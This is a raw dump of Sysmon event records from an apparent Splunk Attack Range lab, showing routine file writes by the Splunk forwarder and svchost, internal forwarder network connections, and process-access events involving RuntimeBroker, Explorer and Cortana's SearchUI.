07:54:30.107{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4DDADA910E1039A086D79E2B8C8D484E,SHA256=C5565FE7DB95043861158FCD1116223E8CC8D4170D6BCD97682BE88B05D1FF79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:31.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B153764F3C128F9404C3FF2165B9857,SHA256=37B93F395B46047F10A0B88D400527AB8F8EEBBF8429BE086E24859653C9C285,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:31.325{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBC1AB14B39BD6673E4EB5332DFDB2C6,SHA256=1A3757B4EFEE9C9ACCABAF78DD304C1257513BE0DC8194C3C98DA451A32D98BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:32.809{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC90E5C5E88E823679BFC0EEBA1122F,SHA256=D9320202A9AC00B3A01F91633CEDA4EB4F2AC747A204C2ABF873DFF4CF6B8980,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:32.325{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA8ED28E3F25C8DF6C7BF8086409CCFA,SHA256=1FAF453AFC763864A62975CEB7E8FD27489EEC44B91C23ACD2D5B21B146021AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:33.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8927988CF9CA631DB3989A2207EB54A,SHA256=EF2065DB945D70E0B59EDF5DC3306E2CEC0F00059D340C321BAF7472E63105A0,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000808008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:32.223{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57294-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:33.419{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DD3C5CDF0B3798310F074BA06B3014E,SHA256=71A62C4E7E1B3527F96B1B41E4F2A2676040F032949E90A1CFDE1CFCD3FB7B9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:25.619{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51060-false10.0.1.12-8000- 23542300x80000000000000001049698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:34.845{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AAB00A6FB49F15847FC9E3E9474EB5A7,SHA256=5F52BED35CD5D6B30A826ADF410B10EABAFD78A7BD0994718C0ECD852100D268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:34.425{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B671734691CC26DE1483DF1FF0F57E6D,SHA256=2B2B75E96192590B14CBDF859A3550FC3599C2351F58A08139B744B5A2F67D00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:35.876{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6EF4685CEA322CFCEAAD950566D855F,SHA256=F5243141CB9AE78292E77E3480A220076358ED50AE8D94E350B05DE784A186B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:35.876{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=BEC53E6D4BE59D23EEBC911FA615E46C,SHA256=E223AAC236A5F16CA5D04404C205699C803B34647119E8DB1D59D561D10B6E89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:35.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2F47D418237552E5711B0C3F760CA57,SHA256=A962BA72DFE20F2B85743D5FB9865E2B291ED3B2D49286C48EF38A6AE3B86F82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:36.907{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=331577CB248E58EE6BCB2ACD32D4E440,SHA256=632C6B2611558215A9974F066721B707D267F06F1A2D08A0525E724B5469D0C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:36.456{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDB0B0085C76E1BB0F411D3CA281890D,SHA256=1B3427C9E0D2FDCA1C2835F54ACA01E6B38F95E0EE0BE7EE733CED18B975B819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:37.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F29F09128DFB7EEA7911C42E5DD6A87,SHA256=BD9B721F306CB0CC603DB79D09DD59468E807635FD6BED63BD9A703D3505D7D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:37.503{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1A1E17D07FB0BB429E2E2BC9EE28F91,SHA256=528E4BEF6BB4A74FB02A51352AB05302A892FFE992D55EE12D0AFC61D01BD494,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001049704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:38.960{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B2BB19C022D8DA422ED5DCCC32B886B,SHA256=5722FC2D3CDB9845DB8E013E0F0ECC402D4DB1C8223C8E928712B9759971C9EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:38.519{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CC4E180B071DFCE77D2C9D6F418832D,SHA256=120719C29FCF80D4DE22FDADD6695A1D8A2B7C456B97E014DD90D566A81AC6ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:38.560{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=39B2D725911BA86CFC348CC490D43A58,SHA256=7277A60D83F128AD5C674EF64F6F20A772B7D7FA19E41383B9EC80E902DE3FC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049706Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:39.976{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2516A41DF54C33CE10E2150460FDF664,SHA256=76599F0CC0567566D676B0C731E2832042C4E0B71894743D6B266B168EA63A6D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:38.214{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57295-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:39.519{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=428486D83E5DA7B1D0A118BFCDFA9B3A,SHA256=6669902592890620A279A1C7A3B44BDC9FC1401A9E758E1B4F5B811A2211BE26,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049705Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:31.663{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51061-false10.0.1.12-8000- 23542300x80000000000000001049707Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:40.990{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E55168AE69B2DA3A9B32BECB6D6C76,SHA256=9E4E9E4998C2D19E1FECA230EF05567B33CAD52BE461EC245C6BE89E04BAC029,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:40.550{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CA066E042EBE45269D48BE07EE8BA31,SHA256=389E21BAACC8E41C98135CA844B7D028CEDC9C0B71A83FC7FF8531DD4DBCD83B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049708Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:41.993{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31E120D51247114FCD4674EFCB47A136,SHA256=C7AEEEB53A79E0C501E718ED35D445BC890EC12CC39EA7DFB2E65F32B54B91F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:41.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=900F8B8E75672B75FC72718E69F4AC95,SHA256=4EDD066AE87B688D0046DB83C81BF5E710ACCF7FC8713B63FF3F722CAC221351,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:42.628{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A41974E3F94F4A8A9F619783236BCCD,SHA256=200D77E981AF50DC9D5EDC45153D199DC017C2B778B8316B31344BDE7A77AE6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:43.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD249003A6E902506FEFCEBD33C3540B,SHA256=409DDD01B09CB3F22A9D9A39FA5BB508ED16869C68C79EBB7EE3F0349189BC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:43.004{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=749BA3142A85E3F14B3E359F49BB004C,SHA256=19DD5156138F9D570F9758DD4D660EA363E1A6E39FC70C9F58979C565F61C460,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:43.229{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57296-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:54:44.706{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5635607959D114843066F35DE57C40ED,SHA256=182539DF7A863D5CAACE5E0D3E37E24C82516476195F4B2F48D0036975D5C79F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=605BDCAAC370784AA45F748D3FCDD881,SHA256=CAB8AE8A6E573281B7EBFE1563541F670E373371082C237BC772DBE939FE31C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\
System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.558{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:44.558{466BC892-32D3-60E8-770B-00000000CF01}63567400C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:54:44.505{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001049737Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
